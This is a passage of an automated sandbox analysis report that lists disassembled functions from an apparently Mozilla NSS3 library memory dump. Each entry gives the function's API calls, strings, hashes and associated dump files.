Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CD8E
Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CDA5
Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C83CCB5
memcpy.VCRUNTIME140(6C8D14F4,6C8D02AC,00000090), ref: 6C83CCD3
memcpy.VCRUNTIME140(6C8D1588,6C8D02AC,00000090), ref: 6C83CD2B

Part of subcall function 6C759AC0: socket.WSOCK32(?,00000017,6C7599BE), ref: 6C759AE6
Part of subcall function 6C759AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C7599BE), ref: 6C759AFC

Part of subcall function 6C760590: closesocket.WSOCK32(6C759A8F,?,?,6C759A8F,00000000), ref: 6C760597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C83CCB0

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: a74915ff465cb073602e36d3e24d40bb6ae3f6bac3e489a22664f6880c22f140
Instruction ID: 3373a76c898eaaa32c8a691d185cecb738b2f8ce79660ac433d3b4821c445212
Opcode Fuzzy Hash: a74915ff465cb073602e36d3e24d40bb6ae3f6bac3e489a22664f6880c22f140
Instruction Fuzzy Hash: DC11B7F5B112505EDB309F999A067423AB99B4633CF502939E4068BF42E738E408CBD5

Function 6C7A1CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6C7A1CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C7A1CF1

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

Strings

pInitArgs = 0x%p, xrefs: 6C7A1CEC
C_Initialize, xrefs: 6C7A1CD3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize
API String ID: 1907330108-3943720641
Opcode ID: 8af242479a1cfc421e04befdc221824b04b2aa4bb9bfc17cc7231a9f77f9d718
Instruction ID: 83ff60bfaf2003a843fdcc2fc372bc14957a6825188ad4f273b5d1b53442df20
Opcode Fuzzy Hash: 8af242479a1cfc421e04befdc221824b04b2aa4bb9bfc17cc7231a9f77f9d718
Instruction Fuzzy Hash: F3012D35202144EBEB209B959A4DA5576B5EB8632EF044535E80992A12DB38BC4AC7D1

Function 6C707F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C7081DF
LeaveCriticalSection.KERNEL32(?), ref: 6C708239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C708255
sqlite3_free.NSS3(00000000), ref: 6C708260

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: 2c3aa9236b4bdc4d1e180a505af2e726f61852a0580ca2143c9851709f5a6a6d
Instruction ID: 15021412ef63a96f0158e60f67b42eb79ac202f63180e9dec68e1c23e8dd7765
Opcode Fuzzy Hash: 2c3aa9236b4bdc4d1e180a505af2e726f61852a0580ca2143c9851709f5a6a6d
Instruction Fuzzy Hash: 98918BB1B01208CBEB18DFE0DA89BADB7F1BF46308F14413AD4169BA51D739A955CBC1

Function 6C7E1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7E1D8F

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7E1DA6

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C7E1E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E1ED0

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: c4ff880d0b5871ec1a4eaa3c20b578d9cdb89571ffe8b1c60911066bdd4411c7
Instruction ID: 66b557219f125b60b8e62cfc31087c2cc2edcdc487af1e24504a318b5c590e85
Opcode Fuzzy Hash: c4ff880d0b5871ec1a4eaa3c20b578d9cdb89571ffe8b1c60911066bdd4411c7
Instruction Fuzzy Hash: D5516A76A00309CFDB10CF98C985BAEB7BABF49319F144129E8199F752D731E945CB90

Function 6C834FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C7185D2,00000000,?,?), ref: 6C834FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C83500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8350C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8350D6

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 0d728c6dbbb3f0776263ac2111d1ba00709ef17bca3d9bdde1ccf9011ae32fcb
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: C84195B6A013158BCB18CF58DCE1796B7E1BF4431871D5A69C84AC7B02E379E891CBC1

Function 6C75FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6C75FDFE), ref: 6C75FFAD

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C75FDFE), ref: 6C75FFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C75FDFE), ref: 6C76001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C75FDFE), ref: 6C76006F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: e982b0c0f8d9fda3f618dac7ab690b773f4e018f97959d7f0bba78338e87532e
Instruction ID: d0495048b0254bbb5892c4aa505410d6b337f3a2849f816cac9e85796eb33643
Opcode Fuzzy Hash: e982b0c0f8d9fda3f618dac7ab690b773f4e018f97959d7f0bba78338e87532e
Instruction Fuzzy Hash: 6A41ED71B002059BDF18DFA5DA85AAE7771BF86318F040039DC0693F01DB39A911CBE1

Function 6C847DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C847E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C847EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C847EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C847ED8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 662c293bb2b4214bde4dbd064df73f031bd7f3af4a361c19368dcc7d1afc8dda
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: 0531B5B1A011158FDB14CF08C99099ABBE2FF8831871B8A79C8585BB11EB71EC45CBD1

Function 6C7FDF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6C783090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C79AE42), ref: 6C7830AA
Part of subcall function 6C783090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7830C7
Part of subcall function 6C783090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7830E5
Part of subcall function 6C783090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C783116
Part of subcall function 6C783090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78312B
Part of subcall function 6C783090: PK11_DestroyObject.NSS3(?,?), ref: 6C783154
Part of subcall function 6C783090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C7FDBBD), ref: 6C7FDFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7FDFEE

Part of subcall function 6C7986D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C798716
Part of subcall function 6C7986D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C798727
Part of subcall function 6C7986D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C79873B
Part of subcall function 6C7986D0: PR_Unlock.NSS3(?), ref: 6C79876F
Part of subcall function 6C7986D0: PR_SetError.NSS3(00000000,00000000), ref: 6C798787

Part of subcall function 6C7BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C7BF854
Part of subcall function 6C7BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C7BF868
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C7BF882
Part of subcall function 6C7BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C7BF889
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C7BF8A4
Part of subcall function 6C7BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C7BF8AB
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C7BF8C9
Part of subcall function 6C7BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C7BF8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C7FDBBD), ref: 6C7FDFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6C7FDBBD), ref: 6C7FE007

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: 410550204e8d2edf37922b976efc2eca466e48cd1145d99521bd8dba125f3510
Instruction ID: 3b296e861741f480a8ac1e007a9bf1cca477932c7287e7118511528278251973
Opcode Fuzzy Hash: 410550204e8d2edf37922b976efc2eca466e48cd1145d99521bd8dba125f3510
Instruction Fuzzy Hash: 1A31E6B0A0420157E710AE79AEC9E9B73E8AF6530CF040135EA29D7B02FB25D519C2E2

Function 6C776C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C776C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C776CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C776CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C898FE0), ref: 6C776CFE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 9e3d487cde7e7a34c129a0986873402d6ecbb6b185af372faad925703a1c51a3
Instruction ID: ebfac83a40163580f0c04dee76e2852311eb2e54f0a060eb12593f4d31e897f1
Opcode Fuzzy Hash: 9e3d487cde7e7a34c129a0986873402d6ecbb6b185af372faad925703a1c51a3
Instruction Fuzzy Hash: A2319EB1A0021A9FDF18DF65CA85ABFBBF5EB45248F10443DD905D7700EB31A905CBA0

Function 6C884F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C884F5D
free.MOZGLUE(?), ref: 6C884F74
free.MOZGLUE(?), ref: 6C884F82
GetLastError.KERNEL32 ref: 6C884F90

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 6cb5f746638725229bc10de842fe5059d857883534ba92364e53b02c853593a0
Instruction ID: 2c54b8d3ecb3c1d67a9501ba21e894622d158427d69ffe1bfe78a111f5a4d42c
Opcode Fuzzy Hash: 6cb5f746638725229bc10de842fe5059d857883534ba92364e53b02c853593a0
Instruction Fuzzy Hash: 263168B6A012194BEB20CB69DD91BDFB3BCFFC5348F050628EC15A7B81DB34A905C691

Function 6C7E6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E6E57

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6EAA

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: b709fc53bce3df9bc22ec827df805178f3e8586dea0ca6cf211065e85d002192
Instruction ID: c9db8f4fcfca62db283fe530d222f892be1aa611a29f1e90b01568e1e6e60a5e
Opcode Fuzzy Hash: b709fc53bce3df9bc22ec827df805178f3e8586dea0ca6cf211065e85d002192
Instruction Fuzzy Hash: E431D77361061AEFDB245F34CE04396B7A8BB0931AF14063CDA99D6AC1EB30B654CF81

Function 6C7CDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C7CDDB1,?,00000000), ref: 6C7CDDF4

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C7CDDB1,?,00000000), ref: 6C7CDE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C7CDDB1,?,00000000), ref: 6C7CDE17

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C7CDE80

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 02c25d921bd3c424f7bcf06617b4fb3d04b25a9297178c104da7e4db7e5b935f
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: D931B5B1A417439FE700CF56C984652B7E8BFB5318B24822ADC1987B01E770F4A4CB85

Function 6C7BFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C795ADC,?,00000000,00000001,?,?,00000000,?,6C78BA55,?,?), ref: 6C7BFE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7BFE5F
PR_Unlock.NSS3(78831D74), ref: 6C7BFEC2
PR_SetError.NSS3(00000000,00000000), ref: 6C7BFED6

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

